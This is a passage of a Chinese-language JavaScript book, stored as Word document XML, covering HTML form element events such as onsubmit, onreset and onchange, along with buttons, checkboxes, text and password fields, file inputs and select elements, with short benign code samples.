        <w:t>按钮来触发。直接调用表单的</w:t>
      </w:r>
      <w:r>
        <w:t>submit()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不触发</w:t>
      </w:r>
      <w:r>
        <w:t>onsubmit</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onreset</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序和</w:t>
      </w:r>
      <w:r>
        <w:t>onsubmit</w:t>
      </w:r>
      <w:r>
        <w:t>是类似</w:t>
      </w:r>
      <w:r>
        <w:t>的。它在表单重置之前调用，通过返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>能够阻止表单元素被重置。在表单中很少需要</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>重置</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，但如果有，你可能需要提醒用户来确认是否重置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>form...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onreset="return confirm('Really erase ALL input and start over?')"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button type="reset"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Clear and Start Over</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/form</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>onsubmit</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，</w:t>
      </w:r>
      <w:r>
        <w:t>onreset</w:t>
      </w:r>
      <w:r>
        <w:t>只能通过单击</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>重置</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮来触发。直接调用表单的</w:t>
      </w:r>
      <w:r>
        <w:t>reset()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不触发</w:t>
      </w:r>
      <w:r>
        <w:t>onreset</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当用户与表单元素交互时它们往往会触发</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>事件，通过定义</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序可以处理这些事件。表</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5-1</w:t>
      </w:r>
      <w:r>
        <w:t>的第三列给出了各个表单元素主要的事件处理程序。一般来说，当按钮表单元素激活（甚至当通过键盘而不是实际的鼠标单击发生激活）时它们会触发</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当用户改变其他表单元素所代表的值时它们会触发</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当用户在</w:t>
      </w:r>
      <w:r>
        <w:t>一个文本域输入文本或从下拉列表中选择了一个选项后就发生这样的改变。注意，在一个文本域中该事件不是每次用户输入一个键值时都会触发。它仅当用户改变了元素的值然后将焦点移到其他元素上时才会触发。也就是说，调用该事件处理程序就意味着一个完整的改变。单选按钮和复选框都有一个状态标识，它们的</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>事件都会触发；两个之中</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>事件更加有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表单元素在收到键盘的焦点时也会触发</w:t>
      </w:r>
      <w:r>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:t>事件，失去焦点时会触发</w:t>
      </w:r>
      <w:r>
        <w:t>blur</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于事件处理程序有一点非常重要，在事件处理程序代码中关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>是触发该事</w:t>
      </w:r>
      <w:r>
        <w:t>件的文档元素的一个引用（我们将在第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章中再次讨论）。既然在＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中的元素都有一个</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用了该包含的表单，这些元素的事件处理程序总是能够通过</w:t>
      </w:r>
      <w:r>
        <w:t>this.form</w:t>
      </w:r>
      <w:r>
        <w:t>来得到</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象的引用。更进一步，这意味着某个表单元素的事件处理程序能够通过</w:t>
      </w:r>
      <w:r>
        <w:t>this.form.x</w:t>
      </w:r>
      <w:r>
        <w:t>得到该表单中以</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>命名的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="389" w:name="15_9_4_An_Niu_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>15.9.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　按钮</w:t>
      </w:r>
      <w:bookmarkEnd w:id="389"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>按钮是最常用的表单元素之一，因为它们是一种视觉上明确让用户触发某种脚本动作的方法。按钮元素本身没有默认的行为，除非它有</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，否则它并没有什么用处。以＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元</w:t>
      </w:r>
      <w:r>
        <w:t>素定义的按钮会将</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性值以纯文本显示。以＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素定义的按钮会将元素的一切内容显示出来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，超级链接与按钮一样提供了</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。当</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>事件所触发的动作可以概念化为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>跟随此链接</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>时就用一个链接；否则，用按钮。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>提交和重置元素本就是按钮，不同的是它们有与之相关联的默认动作（表单的提交和重置）。如果</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，这些按钮的默认动作就不再执行了。可以使用提交元素的</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序来执行表单校验，但是更为常用的是使用</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象本身</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>onsubmit</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序来执行表单校验。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书第四部分未包含按钮。关于所有按钮表单元素的详细内容请参看</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>项，它包含了用＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素创建的按钮。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="390" w:name="15_9_5_Kai_Guan_An_Niu_"/>
      <w:r>
        <w:t>15.9.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　开关按钮</w:t>
      </w:r>
      <w:bookmarkEnd w:id="390"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>复选框和单选元素是开关按钮，或称有两种视觉状态的按钮：选中或未选中。通过对其单击用户可以改变它的开关状态。单选元素为整组有相关性的元素而设计的，组内所有按钮的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>的值都相同。按这种方式创建的单选按钮是互斥的：选中其一，之前选中的即变成未选中。复选框通常也整组使用并共享</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性，必须注意的是当利用做为表</w:t>
      </w:r>
      <w:r>
        <w:t>单属性的名字来选中这些元素时，它返回一个类数组对象而不是单个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>单选和复选框元素都定义了</w:t>
      </w:r>
      <w:r>
        <w:t>checked</w:t>
      </w:r>
      <w:r>
        <w:t>属性。该属性是可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的布尔值，它指定了元素当前是否选中。</w:t>
      </w:r>
      <w:r>
        <w:t>defaultChecked</w:t>
      </w:r>
      <w:r>
        <w:t>属性也是布尔值，它是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>checked</w:t>
      </w:r>
      <w:r>
        <w:t>的值；它指定了元素在第一次加载页面时是否选中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>单选和复选框元素本身不显示任何文本，它们通常和相邻的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文本一起显示（或与＜</w:t>
      </w:r>
      <w:r>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素相关联）。这意味着设置复选框或单选元素的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性不改变元素的视觉表现。设置</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>只改变提交表单时发送到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的字符</w:t>
      </w:r>
      <w:r>
        <w:t>串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当用户单击单选或复选开关按钮，单选或复选框元素触发</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>事件。如果由于单击开关按钮改变了它的状态，它也触发</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。（但注意，当用户单击其他单选按钮而导致这个单选按钮状态的改变，后者不触发</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="391" w:name="15_9_6_Wen_Ben_Yu_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>15.9.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文本域</w:t>
      </w:r>
      <w:bookmarkEnd w:id="391"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文本输入域在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中可能是最常用的元素。用户可以输入单行简短的文本字符串。</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性表示用户输入的文本。通过设置该属性值可以显式地指定应该在输入域中显示的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>placeholder</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了用户</w:t>
      </w:r>
      <w:r>
        <w:t>输入前在输入域中显示的提示信息：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Arrival Date:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="text"name="arrival"placeholder="yyyy-mm-dd"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文本输入域的</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序是在用户输入新的文本或编辑已存在的文本时触发，它表明用户完成了编辑并将焦点移出了文本域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Textarea</w:t>
      </w:r>
      <w:r>
        <w:t>元素类似文本输入域元素，不同的是它允许用户输入（和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序显示）多行文本。</w:t>
      </w:r>
      <w:r>
        <w:t>Textarea</w:t>
      </w:r>
      <w:r>
        <w:t>元素用＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签来创建，与用＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签创建的文本域在语法上</w:t>
      </w:r>
      <w:r>
        <w:t>有显著的区别。（见第四部分的</w:t>
      </w:r>
      <w:r>
        <w:t>TextArea</w:t>
      </w:r>
      <w:r>
        <w:t>。）尽管如此，两种元素的行为非常类似。如同针对</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>元素一样，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Textarea</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="password"</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素在用户输入时显示为星号，它修改了输入的文本。其名字表明，用户输入密码时不用担心他背后的人能看到，这很有用。注意，密码输入元素只能防止眼睛窥视，但在提交表单时输入未经任何加密（除非通过安全的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t>连接提交它），当在网络上传输时它可能被看见。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">input </w:t>
      </w:r>
      <w:r>
        <w:t>type="file"</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素将用户输入待上传到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的文件的名称。它由一个文本域和一个单击打开文件选择对话框的按钮所组成。该文件选取元素拥有</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，就像普通的输入域一样。但不同的是它的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性是只读的。这个防止恶意的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序欺骗用户上传本意不想共享的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不同的文本输入元素定义</w:t>
      </w:r>
      <w:r>
        <w:t>onkeypress</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>onkeydown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>onkeyup</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。可以从</w:t>
      </w:r>
      <w:r>
        <w:t>onkeypress</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>onkeydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，防止记录用户的按键。这很有用，例如，如</w:t>
      </w:r>
      <w:r>
        <w:t>果希望强制用户在特定文本输入域中仅输入数字。该技术的说明参见例</w:t>
      </w:r>
      <w:r>
        <w:t>17-6</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="392" w:name="15_9_7_Xuan_Ze_Kuang_He_Xuan_Xiang_Yuan_"/>
      <w:r>
        <w:t>15.9.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　选择框和选项元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="392"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素表示用户可以做出选择的一组选项（用</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素表示）。浏览器通常将其渲染为下拉菜单的形式，但当指定其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s iz </w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>属性值大于</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>时，它将显示为列表中的选项（可能有滚动）。</w:t>
      </w:r>
      <w:r>
        <w:t>Sele</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ct</w:t>
      </w:r>
      <w:r>
        <w:t>元素能以两种不同的方式运作，这取决于它的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性值是如何设置的。如果＜</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素有</w:t>
      </w:r>
      <w:r>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:t>属性，也就是</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>"select-multiple"</w:t>
      </w:r>
      <w:r>
        <w:t>，那就允许用户选取多个选项。否则，如果没有多选属性，那只能选取单个选项，它的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>"select-one"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>某种程度上</w:t>
      </w:r>
      <w:r>
        <w:t>"select-multiple"</w:t>
      </w:r>
      <w:r>
        <w:t>元素与一组复选框元素类似，</w:t>
      </w:r>
      <w:r>
        <w:t>"select-one"</w:t>
      </w:r>
      <w:r>
        <w:t>元素和一组单选元素类似。但是，由</w:t>
      </w:r>
      <w:r>
        <w:t>Sele</w:t>
      </w:r>
      <w:r>
        <w:t>ct</w:t>
      </w:r>
      <w:r>
        <w:t>元素显示的选项并不是开关按钮：它们由＜</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素定义。</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素定义了</w:t>
      </w:r>
      <w:r>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它是一个包含了多个</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当用户选取或取消选取一个选项时，</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素触发</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。针对</w:t>
      </w:r>
      <w:r>
        <w:t>"select-one"Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素，它的可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写属性</w:t>
      </w:r>
      <w:r>
        <w:t>selectedIndex</w:t>
      </w:r>
      <w:r>
